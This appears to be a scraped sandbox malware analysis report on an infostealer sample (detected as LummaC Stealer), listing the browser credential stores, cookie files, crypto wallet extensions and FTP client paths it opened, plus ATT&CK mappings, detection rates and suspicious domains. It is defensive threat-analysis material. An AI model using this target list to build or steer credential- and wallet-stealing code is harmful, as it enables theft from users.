              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2104689595.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2123719627.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2106741517.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2120737327.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2076312440.0000000001199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2075895633.0000000001197000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2123446678.00000000011B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2120936857.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2089453948.00000000011A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2090525547.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2120905193.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2077335207.0000000001199000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5800, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5800, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		751
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory34
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets223
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe50%VirustotalBrowse
              file.exe39%ReversingLabsWin32.Trojan.Amadey
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              necklacedmny.store21%VirustotalBrowse
              presticitpo.store11%VirustotalBrowse
              fadehairucw.store12%VirustotalBrowse
              thumbystriw.store15%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
